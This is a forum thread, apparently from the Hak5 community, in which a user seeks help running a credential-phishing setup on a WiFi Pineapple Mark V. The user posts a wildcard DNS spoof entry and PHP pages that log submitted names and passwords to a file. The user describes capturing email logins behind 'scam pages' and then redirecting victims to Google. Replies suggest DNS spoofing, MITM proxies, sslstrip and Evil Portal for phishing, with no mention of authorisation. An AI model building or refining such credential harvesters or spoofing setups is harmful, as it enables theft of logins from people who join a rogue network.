Phishing with a WiFi Pineapple

[troter]

Merry xmass to all readers !!!

After reading a lot of stuff about Mark V i finally got it

but as all manuals related to mark IV im really stuck..

For example : http://hak5.org/hack/pineapple-phishing

Can anyone explain what do i need to change to make it working on Mark V ?

Thanks

[daniboy92]

I think for this you need to use dnspoof.

[troter]

Yes Sure bro. Tnks

What i whant to do is next :

i want to create a index.html page with post asking for the mail and pass. after user will connect and enter details ill just use redirect to google.

will it work ?

[troter]

Hi again !

After reading several manuals regarding using fish catching i didnt get any luck with it

(maybe coz mark IV and V is different ?)

My target is to redirect all incoming traffic to index.html

anyone can advise what im doing wrong plz ?

my setting is below :

DNS

172.16.42.1 *

Index.php

<html>
<head>
<meta http-equiv="REFRESH" content="0;url=redirect.php">
</head>
<body>
</body>
</html>

redirect.php

<?php
        $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

        if (strpos($ref, "*")){
		header('Home');
                header('Location: index.html');
        }

        require('error.php');

?>

error.php

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
        $nam = stripslashes($_POST['name']);
        $pas = stripslashes($_POST['pass']);
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);

        $content = $today . "  --  " . $ref . "  --  " . $nam . "  --  " . $pas;

        $filed = @fopen("/tmp/pineapple-phish.log", "a+");
        @fwrite($filed, "$content\n");
        @fclose($filed);
}
?>

<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body></html>

when client connects to pineapple he getting blank page..

if internet present client is able to use it

Ps: Karma is running

Firmware Version: 2.1.1

PHP Version 5.4.5 System Linux Pineapple 3.3.8 #21 Tue Dec 9 16:16:09 PST 2014 mips Build Date Oct 9 2014 16:09:31

[troter]

anyone can help ???

[troter]

PS: when the client connects to wifi pineapple and entering 172.16.42.1 magic happened..

in any another case i mean if i type google yahoo or whatever im just getting blank screen...

any one can help ??

[Geoff0ne]

You're waisting your time with DNSpoof. The spoof success rate is fairly low given most modern browsers cache the correct DNS entries.

[Sebkinne]

You're waisting your time with DNSpoof. The spoof success rate is fairly low given most modern browsers cache the correct DNS entries.

This is true. We do however have a better alternative for this coming soon!

Best regards,

Sebkinne

[masler77]

Seb, you might have a little spoiler what the future holds !? :-D

[DataHead]

He speaks of their secret mitm proxy

[troter]

Thanks 4 replays

After i made some research i realised 2 week point

1) Can not set up automatic DNS spoof (dips pins etc don't have any decent description i mean set up manual)

2) Browsers.. is another story..

a) Safary 502 Bad Gateway (nginx /1.2.2)

Strange thing is : after i join network from iphone for a second i saw half login screen.. saying captive.apple.com

Tony is name of my network

anyone can explain ??

captive.apple.com anyone can explain ???

b) Opera .. is good.. mobile opera same as standard version

PS:

Just read this article

http://stackoverflow.com/questions/19682624/bypasses-apple-captive-network-assistant-login-in-ios-7

Edited December 26, 2014 by troter

[Geoff0ne]

This is true. We do however have a better alternative for this coming soon!

Best regards,

Sebkinne

He speaks of their secret mitm proxy

This? https://mitmproxy.org

Looks fairly simply to configure.

[DrDinosaur]

This? https://mitmproxy.org

Looks fairly simply to configure.

See my thread on trying to install it.

[DataHead]

not that specificaly, but seb mentioned in a different thread that they are working on one of their own designed for the mk5! said hoped to have it out before the end of this year, good things to come :D and hopefully with the new sslstrip :D

[DataHead]

he mentions it in this post

https://forums.hak5.org/index.php?/topic/34187-release-211-codename-pineosauria-mobilus/?p=254756

Happens to all of us ;)

All the changes / additions we have made can be found in the changelog on the first page.

In regards to a better dnsspoof, we are still working on our MITM proxy which will hopefully be released before the end of the year.

Otherwise, we'll soon have a hangout where we will discuss future features.

Best regards,

Sebkinne

Edited December 27, 2014 by datahead

[bytedeez]

i find evil portal to be great at phishing. Depending on how you setup your landing page of course.

Edited December 27, 2014 by bytedeez

[johnjdoe]

This is perhaps a little bit OT, but yesterday I found the Lucy Phishing Server (http://phishing-server.com/). This could be a nice alternative if you want do some more specific phishing campaigns ...

[Geoff0ne]

i find evil portal to be great at phishing. Depending on how you setup your landing page of course.

Correct me if im wrong, but the evil portal only realistically can produce a single phishing page being the landing page. Is this right?

[Geoff0ne]

See my thread on trying to install it.

I would but i cannot view your topics under your profile.....

[troter]

I would but i cannot view your topics under your profile.....

follow the white rabbit published posts

[Darren Kitchen]

Correct me if im wrong, but the evil portal only realistically can produce a single phishing page being the landing page. Is this right?

Ish... Some php-fu should be able to determine the domain queried and forward on to an adequate landing page. I haven't tried it myself but knowing nodogsplash, the data required should be there somewhere.

[troter]

need some advice ..

i got 10 scam pages.. a.html, b.htmlc.html....j.html

redirection is set up..

is it possible to user to browse i-net as normal via internet sharing and triger only on my 10 pages ?

currently i have dns set up to *